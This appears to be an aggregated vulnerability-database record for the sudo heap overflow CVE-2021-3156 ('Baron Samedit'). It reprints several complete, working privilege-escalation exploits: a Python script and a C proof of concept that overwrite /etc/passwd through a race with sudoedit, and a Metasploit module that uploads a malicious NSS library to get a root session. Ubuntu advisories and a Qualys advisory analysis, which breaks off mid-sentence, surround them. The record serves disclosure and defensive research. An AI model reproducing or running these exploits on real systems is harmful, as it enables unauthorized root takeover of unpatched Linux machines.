try:\r\n os.mkdir(directory, 0o700)\r\n os.symlink(self.target, '%s/%s' % (directory,\r\nself.username))\r\n os.waitpid(child, 0)\r\n except:\r\n continue\r\n else:\r\n sys.stdout.write('[+] child %d \\n' % i)\r\n sys.stdout.flush()\r\n os.setpriority(os.PRIO_PROCESS, 0, 20)\r\n os.execve(\r\n path='/usr/bin/sudoedit',\r\n argv=[\r\n '/usr/bin/sudoedit',\r\n '-A',\r\n '-s',\r\n '\\\\',\r\n overflow\r\n ],\r\n env=environ\r\n )\r\n sys.stdout.write('[!] execve failed\\n')\r\n sys.stdout.flush()\r\n os.abort()\r\n break\r\n\r\n if self.size != self.getSize(self.target):\r\n sys.stdout.write('[*] success at iteration %d \\n' % i)\r\n sys.stdout.flush()\r\n break\r\n sys.stdout.write(\"\"\"\r\n \\nConsider the following if the exploit fails:\r\n \\n\\t(1) If all directories are owned by root then sleep\r\nneeds to be decreased.\r\n \\n\\t(2) If they're all owned by you, then sleep needs\r\nincreased.\r\n \"\"\")\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(\r\n add_help=True,\r\n description='* Sudo Privilege Escalation / Heap Overflow -\r\nCVE-2021-3156 *'\r\n )\r\n try:\r\n parser.add_argument('-source', action='store', help='Path to\r\nmalicious \"passwd\" file to overwrite the target')\r\n parser.add_argument('-target', action='store', help='Target\r\nfile path to be overwritten (default: /etc/passwd)')\r\n parser.add_argument('-sleep', action='store', help='Sleep\r\nsetting for forked processes (default: 0.01 seconds')\r\n parser.set_defaults(target='/etc/passwd', sleep='0.01')\r\n\r\n options = parser.parse_args()\r\n if options.source is None:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n exp = Exploit(\r\n source=options.source,\r\n target=options.target,\r\n sleep=float(options.sleep)\r\n )\r\n exp.main()\r\n except Exception as err:\r\n sys.stderr.write(str(err))", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49521"}], "ubuntu": [{"lastseen": "2021-02-04T15:51:50", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "USN-4705-1 fixed a vulnerability in Sudo. This update provides \nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Sudo incorrectly handled memory when parsing command \nlines. A local attacker could possibly use this issue to obtain unintended \naccess to the administrator account. (CVE-2021-3156)", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "USN-4705-2", "href": "https://ubuntu.com/security/notices/USN-4705-2", "title": "Sudo vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T16:06:52", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "It was discovered that Sudo incorrectly handled memory when parsing command \nlines. A local attacker could possibly use this issue to obtain unintended \naccess to the administrator account. (CVE-2021-3156)\n\nIt was discovered that the Sudo sudoedit utility incorrectly handled \nchecking directory permissions. A local attacker could possibly use this \nissue to bypass file permissions and determine if a directory exists or \nnot. (CVE-2021-23239)", "edition": 2, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "USN-4705-1", "href": "https://ubuntu.com/security/notices/USN-4705-1", "title": "Sudo vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-02-03T17:16:54", "description": "", "published": "2021-02-03T00:00:00", "type": "packetstorm", "title": "Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "PACKETSTORM:161270", "href": "https://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) \n# Date: 2021-02-02 \n# Exploit Author: West Shepherd \n# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. \n# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 \n# CVE : CVE-2021-3156 \n# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code. \n# Sources: \n# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit \n# (2) https://github.com/stong/CVE-2021-3156 \n# Requirements: Python3 \n \n#!/usr/bin/python3 \nimport os \nimport pwd \nimport time \nimport sys \nimport argparse \n \n \nclass Exploit(object): \nusername = '' \nsize = 0 \ndata = '' \n \ndef __init__(self, source, target, sleep): \nself.sleep = sleep \nself.source = source \nself.target = target \n \n@staticmethod \ndef readFile(path): \nreturn open(path, 'r').read() \n \n@staticmethod \ndef getUser(): \nreturn pwd.getpwuid(os.getuid())[0] \n \n@staticmethod \ndef getSize(path): \nreturn os.stat(path).st_size \n \ndef main(self): \nself.username = self.getUser() \nself.data = self.readFile(self.source) \nself.size = self.getSize(self.target) \nenviron = { \n'\\n\\n\\n\\n\\n': '\\n' + self.data, \n'SUDO_ASKPASS': '/bin/false', \n'LANG': \n'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', \n'A': 'A' * 0xffff \n} \nfor i in range(5000): \ndirectory = \n'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i \noverflow = \n'11111111111111111111111111111111111111111111111111111111%s' % \ndirectory \n \nif os.path.exists(directory): \nsys.stdout.write('file exists %s\\n' % directory) \ncontinue \n \nchild = os.fork() \nos.environ = environ \nif child: \nsys.stdout.write('[+] parent %d \\n' % i) \nsys.stdout.flush() \ntime.sleep(self.sleep) \nif not os.path.exists(directory): \ntry: \nos.mkdir(directory, 0o700) \nos.symlink(self.target, '%s/%s' % (directory, \nself.username)) \nos.waitpid(child, 0) \nexcept: \ncontinue \nelse: \nsys.stdout.write('[+] child %d \\n' % i) \nsys.stdout.flush() \nos.setpriority(os.PRIO_PROCESS, 0, 20) \nos.execve( \npath='/usr/bin/sudoedit', \nargv=[ \n'/usr/bin/sudoedit', \n'-A', \n'-s', \n'\\\\', \noverflow \n], \nenv=environ \n) \nsys.stdout.write('[!] execve failed\\n') \nsys.stdout.flush() \nos.abort() \nbreak \n \nif self.size != self.getSize(self.target): \nsys.stdout.write('[*] success at iteration %d \\n' % i) \nsys.stdout.flush() \nbreak \nsys.stdout.write(\"\"\" \n\\nConsider the following if the exploit fails: \n\\n\\t(1) If all directories are owned by root then sleep \nneeds to be decreased. \n\\n\\t(2) If they're all owned by you, then sleep needs \nincreased. \n\"\"\") \n \n \nif __name__ == '__main__': \nparser = argparse.ArgumentParser( \nadd_help=True, \ndescription='* Sudo Privilege Escalation / Heap Overflow - \nCVE-2021-3156 *' \n) \ntry: \nparser.add_argument('-source', action='store', help='Path to \nmalicious \"passwd\" file to overwrite the target') \nparser.add_argument('-target', action='store', help='Target \nfile path to be overwritten (default: /etc/passwd)') \nparser.add_argument('-sleep', action='store', help='Sleep \nsetting for forked processes (default: 0.01 seconds') \nparser.set_defaults(target='/etc/passwd', sleep='0.01') \n \noptions = parser.parse_args() \nif options.source is None: \nparser.print_help() \nsys.exit(1) \n \nexp = Exploit( \nsource=options.source, \ntarget=options.target, \nsleep=float(options.sleep) \n) \nexp.main() \nexcept Exception as err: \nsys.stderr.write(str(err)) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161270/sudo195p1-overflowescalate.txt"}, {"lastseen": "2021-02-01T16:48:34", "description": "", "published": "2021-02-01T00:00:00", "type": "packetstorm", "title": "Sudo Buffer Overflow / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-01T00:00:00", "id": "PACKETSTORM:161230", "href": "https://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Local Privilege Escalation - LPE \n# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty \n# Date: 30.01.2021 \n# Vendor: https://www.sudo.ws/ \n# Link: https://www.sudo.ws/download.html \n# CVE: CVE-2021-3156 \n \n \n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) \n[+] Website: https://www.nu11secur1ty.com/ \n[+] Source: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 \n \n \n[Exploit Program Code] \n \n// Exploit by @gf_256 aka cts \n// With help from r4j \n// Debug by @nu11secur1ty \n// Original advisory by Baron Samedit of Qualys \n \n// Tested on Ubuntu 18.04 and 20.04 & 20.04.01 \n// You will probably need to adjust RACE_SLEEP_TIME. \n \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <stdlib.h> \n#include <assert.h> \n#include <unistd.h> \n#include <sys/wait.h> \n#include <sys/types.h> \n#include <sys/resource.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <fcntl.h> \n#include <pwd.h> \n \n// !!! best value of this varies from system-to-system !!! \n// !!! you will probably need to tune this !!! \n#define RACE_SLEEP_TIME 10000 \n \nchar *target_file; \nchar *src_file; \n \nsize_t query_target_size() \n{ \nstruct stat st; \nstat(target_file, &st); \nreturn st.st_size; \n} \n \nchar* read_src_contents() \n{ \nFILE* f = fopen(src_file, \"rb\"); \nif (!f) { \nputs(\"oh no baby what are you doing :(\"); \nabort(); \n} \nfseek(f, 0, SEEK_END); \nlong fsize = ftell(f); \nfseek(f, 0, SEEK_SET); \nchar *content = malloc(fsize + 1); \nfread(content, 1, fsize, f); \nfclose(f); \nreturn content; \n} \n \nchar* get_my_username() \n{ \n// getlogin can return incorrect result (for example, root under su)! \nstruct passwd *pws = getpwuid(getuid()); \nreturn strdup(pws->pw_name); \n} \n \nint main(int my_argc, char **my_argv) \n{ \nputs(\"CVE-2021-3156 PoC by @gf_256\"); \nputs(\"original advisory by Baron Samedit\"); \n \nif (my_argc != 3) { \nputs(\"./meme <target file> <src file>\"); \nputs(\"Example: ./meme /etc/passwd my_fake_passwd_file\"); \nreturn 1; \n} \ntarget_file = my_argv[1]; \nsrc_file = my_argv[2]; \nprintf(\"we will overwrite %s with shit from %s\\n\", target_file, \nsrc_file); \n \nchar* myusername = get_my_username(); \nprintf(\"hi, my name is %s\\n\", myusername); \n \nsize_t initial_size = query_target_size(); \nprintf(\"%s is %zi big right now\\n\", target_file, initial_size); \n \nchar* shit_to_write = read_src_contents(); \n \nchar memedir[1000]; \nchar my_symlink[1000]; \nchar overflow[1000]; \n \nchar* bigshit = calloc(1,0x10000); \nmemset(bigshit, 'A', 0xffff); // need a big shit in the stack so the \nwrite doesn't fail with bad address \n \nchar *argv[] = {\"/usr/bin/sudoedit\", \"-A\", \"-s\", \"\\\\\", \noverflow, \nNULL \n}; \n \nchar *envp[] = { \n\"\\n\\n\\n\\n\\n\", // put some fuckin newlines here to separate our real \ncontents from the junk \nshit_to_write, \n\"SUDO_ASKPASS=/bin/false\", \n \n\"LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n\", \nbigshit, \nNULL \n}; \n \nputs(\"ok podracing time bitches\"); \n \n// Boom =) \n// for (int i = 0; i < 5000; i++) \nfor (int i = 0; i < 3000; i++) { \nsprintf(memedir, \n\"ayylmaobigchungussssssssssss00000000000000000000000000%08d\", i); \nsprintf(overflow, \n\"11111111111111111111111111111111111111111111111111111111%s\", memedir); \nsprintf(my_symlink, \"%s/%s\", memedir, myusername); \nputs(memedir); \n \nif (access(memedir, F_OK) == 0) { \nprintf(\"dude, %s already exists, do it from a clean working \ndir\\n\", memedir); \nreturn 1; \n} \n \npid_t childpid = fork(); \nif (childpid) { // parent \nusleep(RACE_SLEEP_TIME); \nmkdir(memedir, 0700); \nsymlink(target_file, my_symlink); \nwaitpid(childpid, 0, 0); \n} else { // child \nsetpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race \nreliability \nexecve(\"/usr/bin/sudoedit\", argv, envp); // noreturn \nputs(\"execve fails?!\"); \nabort(); \n} \n \nif (query_target_size() != initial_size) { \nputs(\"target file has a BRUH MOMENT!!!! SUCCess???\"); \nsystem(\"xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'\"); \n// ayy lmao \nreturn 0; \n} \n} \n \nputs(\"Failed?\"); \nputs(\"if all the meme dirs are owned by root, the usleep needs to be \ndecreased.\"); \nputs(\"if they're all owned by you, the usleep needs to be increased\"); \n \n \nreturn 0; \n} \n \n[Vendor] \nSudo \n \n \n[Vulnerability Type] \nBuffer Overflow Local Privilege Escalation \n \n[CVE Reference] \nSudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege \nescalation to root via \"sudoedit -s\" \nand a command-line argument that ends with a single backslash character. \n \n[Security Issue] \nTaking control of the Linux system \nVulnerabilty version: before 1.9.5p2 \n \n \n[Video] \nhttps://www.youtube.com/watch?v=L-dEIYEQd1E \n \n \n[Conclusion and Fix] \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156 \nhttps://www.youtube.com/watch?v=zf8FXOFWZKs \n \n \n@nu11secur1ty \nhttps://www.nu11secur1ty.com/ \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161230/sudo-escalate.txt"}, {"lastseen": "2021-02-05T16:54:08", "description": "", "published": "2021-02-05T00:00:00", "type": "packetstorm", "title": "Sudo 1.8.31p2 / 1.9.5p1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-05T00:00:00", "id": "PACKETSTORM:161293", "href": "https://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::File \ninclude Msf::Post::Unix \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::Linux::System \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Sudo Heap-Based Buffer Overflow', \n'Description' => %q( \nA heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker \nto gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 \nthrough 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this \nimplementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker \ncontrolled library which results in it being loaded with the elevated privileges held by sudo. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # vulnerability discovery and analysis \n'Spencer McIntyre', # metasploit module \n'bwatters-r7', # metasploit module \n'blasty <blasty@fail0verflow.com>', # original PoC \n'Alexander Krog' # detailed vulnerability analysis and exploit technique \n], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Platform' => ['unix', 'linux'], \n'References' => [ \n['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'], \n['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'], \n['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'], \n['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'], \n['CVE', '2021-3156'], \n], \n'Targets' => \n[ \n[ 'Manual', { } ], \n[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ], \n[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ] } ], \n], \n'DefaultTarget' => 1, \n'Arch' => ARCH_X64, \n'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 }, \n'DisclosureDate' => '2021-01-26', \n'Notes' => { \n'AKA' => [ 'Baron Samedit' ], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) \n]) \n \nregister_advanced_options([ \nOptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\\d+(,[ ]*| )){3}\\d+/) \n]) \n \nderegister_options('COMPILE') \nend \n \ndef get_versions \nversions = {} \noutput = cmd_exec(\"sudo --version\") \nif output \nversion = output.split(\"\\n\").first.split(' ').last \nversions[:sudo] = version if version =~ /^\\d/ \nend \n \nversions \nend \n \ndef check \nsudo_version = get_versions[:sudo] \nreturn CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil? \n \n# fixup the p number used by sudo to be compatible with Gem::Version \nsudo_version.gsub!(/p/, '.') \n \nvuln_builds = [ \n[Gem::Version.new('1.8.2'), Gem::Version.new('1.8.31.2')], \n[Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')], \n] \n \nif sudo_version == '1.8.31' \n# Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31 \nreturn CheckCode::Detected(\"sudo #{sudo_version} maybe a vulnerable build.\") \nend \n \nif vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) } \nreturn CheckCode::Appears(\"sudo #{sudo_version} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"sudo #{sudo_version} is not a vulnerable build.\") \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nwrite_file path, data \nend \n \ndef exploit \nif target.name == 'Manual' \nfail_with(Failure::BadConfig, 'The \"Lengths\" advanced option must be specified for the manual target') if datastore['Lengths'].blank? \narguments = datastore['Lengths'].gsub(/,/, ' ').gsub(/ +/, ' ') \nelse \narguments = target[:lengths].join(' ') \nend \n \nfail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc? \n \npath = datastore['WritableDir'] \ncmd_exec(\"mkdir -p #{path}/libnss_X\") \n \nfile_name = rand_text_alphanumeric(5..10) \nupload_and_compile(\"#{path}/#{file_name}\", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil') \nupload(\"#{path}/libnss_X/P0P_SH3LLZ_ .so.2\", generate_payload_dll) \ncmd_exec(\"#{path}/#{file_name} #{arguments}\") \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161293/sudo_baron_samedit.rb.txt"}, {"lastseen": "2021-01-27T14:32:41", "description": "", "published": "2021-01-27T00:00:00", "type": "packetstorm", "title": "Sudo Heap-Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "id": "PACKETSTORM:161160", "href": "https://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "sourceData": "` \nQualys Security Advisory \n \nBaron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156) \n \n \n======================================================================== \nContents \n======================================================================== \n \nSummary \nAnalysis \nExploitation \nAcknowledgments \nTimeline \n \n \n======================================================================== \nSummary \n======================================================================== \n \nWe discovered a heap-based buffer overflow in Sudo \n(https://www.sudo.ws/). This vulnerability: \n \n- is exploitable by any local user (normal users and system users, \nsudoers and non-sudoers), without authentication (i.e., the attacker \ndoes not need to know the user's password); \n \n- was introduced in July 2011 (commit 8255ed69), and affects all legacy \nversions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to \n1.9.5p1, in their default configuration. \n \nWe developed three different exploits for this vulnerability, and \nobtained full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 \n(Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and \ndistributions are probably also exploitable. \n \n \n======================================================================== \nAnalysis \n======================================================================== \n \nIf Sudo is executed to run a command in \"shell\" mode (shell -c command): \n \n- either through the -s option, which sets Sudo's MODE_SHELL flag; \n \n- or through the -i option, which sets Sudo's MODE_SHELL and \nMODE_LOGIN_SHELL flags; \n \nthen, at the beginning of Sudo's main(), parse_args() rewrites argv \n(lines 609-617), by concatenating all command-line arguments (lines \n587-595) and by escaping all meta-characters with backslashes (lines \n590-591): \n \n------------------------------------------------------------------------ \n571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n572 char **av, *cmnd = NULL; \n573 int ac = 1; \n... \n581 cmnd = dst = reallocarray(NULL, cmnd_size, 2); \n... \n587 for (av = argv; *av != NULL; av++) { \n588 for (src = *av; *src != '\\0'; src++) { \n589 /* quote potential meta characters */ \n590 if (!isalnum((unsigned char)*src) && *src != '_' && *src != '-' && *src != '$') \n591 *dst++ = '\\\\'; \n592 *dst++ = *src; \n593 } \n594 *dst++ = ' '; \n595 } \n... \n600 ac += 2; /* -c cmnd */ \n... \n603 av = reallocarray(NULL, ac + 1, sizeof(char *)); \n... \n609 av[0] = (char *)user_details.shell; /* plugin may override shell */ \n610 if (cmnd != NULL) { \n611 av[1] = \"-c\"; \n612 av[2] = cmnd; \n613 } \n614 av[ac] = NULL; \n615 \n616 argv = av; \n617 argc = ac; \n618 } \n------------------------------------------------------------------------ \n \nLater, in sudoers_policy_main(), set_cmnd() concatenates the \ncommand-line arguments into a heap-based buffer \"user_args\" (lines \n864-871) and unescapes the meta-characters (lines 866-867), \"for sudoers \nmatching and logging purposes\": \n \n------------------------------------------------------------------------ \n819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n... \n852 for (size = 0, av = NewArgv + 1; *av; av++) \n853 size += strlen(*av) + 1; \n854 if (size == 0 || (user_args = malloc(size)) == NULL) { \n... \n857 } \n858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n... \n864 for (to = user_args, av = NewArgv + 1; (from = *av); av++) { \n865 while (*from) { \n866 if (from[0] == '\\\\' && !isspace((unsigned char)from[1])) \n867 from++; \n868 *to++ = *from++; \n869 } \n870 *to++ = ' '; \n871 } \n... \n884 } \n... \n886 } \n------------------------------------------------------------------------ \n \nUnfortunately, if a command-line argument ends with a single backslash \ncharacter, then: \n \n- at line 866, \"from[0]\" is the backslash character, and \"from[1]\" is \nthe argument's null terminator (i.e., not a space character); \n \n- at line 867, \"from\" is incremented and points to the null terminator; \n \n- at line 868, the null terminator is copied to the \"user_args\" buffer, \nand \"from\" is incremented again and points to the first character \nafter the null terminator (i.e., out of the argument's bounds); \n \n- the \"while\" loop at lines 865-869 reads and copies out-of-bounds \ncharacters to the \"user_args\" buffer. \n \nIn other words, set_cmnd() is vulnerable to a heap-based buffer \noverflow, because the out-of-bounds characters that are copied to the \n\"user_args\" buffer were not included in its size (calculated at lines \n852-853). \n \nIn theory, however, no command-line argument can end with a single \nbackslash character: if MODE_SHELL or MODE_LOGIN_SHELL is set (line 858, \na necessary condition for reaching the vulnerable code), then MODE_SHELL \nis set (line 571) and parse_args() already escaped all meta-characters, \nincluding backslashes (i.e., it escaped every single backslash with a \nsecond backslash). \n \nIn practice, however, the vulnerable code in set_cmnd() and the escape \ncode in parse_args() are surrounded by slightly different conditions: \n \n------------------------------------------------------------------------ \n819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n... \n858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n------------------------------------------------------------------------ \n \nversus: \n \n------------------------------------------------------------------------ \n571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n------------------------------------------------------------------------ \n \nOur question, then, is: can we set MODE_SHELL and either MODE_EDIT or \nMODE_CHECK (to reach the vulnerable code) but not the default MODE_RUN \n(to avoid the escape code)? \n \nThe answer, it seems, is no: if we set MODE_EDIT (-e option, line 361) \nor MODE_CHECK (-l option, lines 423 and 519), then parse_args() removes \nMODE_SHELL from the \"valid_flags\" (lines 363 and 424) and exits with an \nerror if we specify an invalid flag such as MODE_SHELL (lines 532-533): \n \n------------------------------------------------------------------------ \n358 case 'e': \n... \n361 mode = MODE_EDIT; \n362 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n363 valid_flags = MODE_NONINTERACTIVE; \n364 break; \n... \n416 case 'l': \n... \n423 mode = MODE_LIST; \n424 valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST; \n425 break; \n... \n518 if (argc > 0 && mode == MODE_LIST) \n519 mode = MODE_CHECK; \n... \n532 if ((flags & valid_flags) != flags) \n533 usage(1); \n------------------------------------------------------------------------ \n \nBut we found a loophole: if we execute Sudo as \"sudoedit\" instead of \n\"sudo\", then parse_args() automatically sets MODE_EDIT (line 270) but \ndoes not reset \"valid_flags\", and the \"valid_flags\" include MODE_SHELL \nby default (lines 127 and 249): \n \n------------------------------------------------------------------------ \n127 #define DEFAULT_VALID_FLAGS (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL) \n... \n249 int valid_flags = DEFAULT_VALID_FLAGS; \n... \n267 proglen = strlen(progname); \n268 if (proglen > 4 && strcmp(progname + proglen - 4, \"edit\") == 0) { \n269 progname = \"sudoedit\"; \n270 mode = MODE_EDIT; \n271 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n272 } \n------------------------------------------------------------------------ \n \nConsequently, if we execute \"sudoedit -s\", then we set both MODE_EDIT \nand MODE_SHELL (but not MODE_RUN), we avoid the escape code, reach the \nvulnerable code, and overflow the heap-based buffer \"user_args\" through \na command-line argument that ends with a single backslash character: \n \n------------------------------------------------------------------------ \nsudoedit -s '\\' `perl -e 'print \"A\" x 65536'` \nmalloc(): corrupted top size \nAborted (core dumped) \n------------------------------------------------------------------------ \n \nFrom an attacker's point of view, this buffer overflow is ideal: \n \n- we control the size of the \"user_args\" buffer that we overflow (the \nsize of our concatenated command-line arguments, at lines 852-854); \n \n- we independently control the size and contents of the overflow itself \n(our last command-line argument is conveniently followed by our first \nenvironment variables, which are not included in the size calculation \nat lines 852-853); \n \n- we can even write null bytes to the buffer that we overflow (every \ncommand-line argument or environment variable that ends with a single \nbackslash writes a null byte to \"user_args\", at lines 866-868). \n \nFor example, on an amd64 Linux, the following command allocates a \n24-byte \"user_args\" buffer (a 32-byte heap chunk) and overwrites the \nnext chunk's size field with \"A=a\\0B=b\\0\" (0x00623d4200613d41), its fd \nfield with \"C=c\\0D=d\\0\" (0x00643d4400633d43), and its bk field with \n\"E=e\\0F=f\\0\" (0x00663d4600653d45): \n \n------------------------------------------------------------------------ \nenv -i 'AA=a\\' 'B=b\\' 'C=c\\' 'D=d\\' 'E=e\\' 'F=f' sudoedit -s '1234567890123456789012\\' \n------------------------------------------------------------------------ \n \n--|--------+--------+--------+--------|--------+--------+--------+--------+-- \n| | |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.| \n--|--------+--------+--------+--------|--------+--------+--------+--------+-- \nsize <---- user_args buffer ----> size fd bk \n \n \n======================================================================== \nExploitation \n======================================================================== \n \nBecause Sudo calls localization functions at the very beginning of its \nmain() function: \n \n------------------------------------------------------------------------ \n154 setlocale(LC_ALL, \"\"); \n155 bindtextdomain(PACKAGE_NAME, LOCALEDIR); \n156 textdomain(PACKAGE_NAME); \n------------------------------------------------------------------------ \n \nand passes translation strings (through the gettext() function and _() \nmacro) to format-string functions such as: \n \n------------------------------------------------------------------------ \n301 sudo_printf(SUDO_CONV_ERROR_MSG, _(\"%s is not in the sudoers \" \n302 \"file. This incident will be reported.\\n\"), user_name); \n------------------------------------------------------------------------ \n \nwe initially wanted to reuse halfdog's fascinating technique from \nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and \ntransform Sudo's heap-based buffer overflow into a format-string \nexploit. More precisely: \n \n- at line 154, in setlocale(), we malloc()ate and free() several LC \nenvironment variables (LC_CTYPE, LC_MESSAGES, LC_TIME, etc), thereby \ncreating small holes at the very beginning of Sudo's heap (free fast \nor tcache chunks); \n \n- at line 155, bindtextdomain() malloc()ates a struct binding, which \ncontains a dirname pointer to the name of a directory that contains \n\".mo\" catalog files and hence translation strings; \n \n- in set_cmnd(), we malloc()ate the \"user_args\" buffer into one of the \nholes at the beginning of Sudo's heap, and overflow this buffer, thus \noverwriting the struct binding's dirname pointer; \n \n- at line 301 (for example), gettext() (through the _() macro) loads our \nown translation string from the overwritten dirname -- in other words, \nwe control the format string that is passed to sudo_printf(). \n \nTo implement this initial technique, we wrote a rudimentary brute-forcer \nthat executes Sudo inside gdb, overflows the \"user_args\" buffer, and \nrandomly selects the following parameters: \n \n- the LC environment variables that we pass to Sudo, and their length \n(we use the \"C.UTF-8\" locale and append a random \"@modifier\"); \n \n- the size of the \"user_args\" buffer that we overflow; \n \n- the size of the overflow itself; \n \n- whether we go through Sudo's authentication code (-A or -n option) or \nnot (-u #realuid option). \n \nUnfortunately, this initial technique failed; our brute-forcer was able \nto overwrite the struct binding's dirname pointer: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. \n \n0x00007f6e0dde1ea9 in __dcigettext 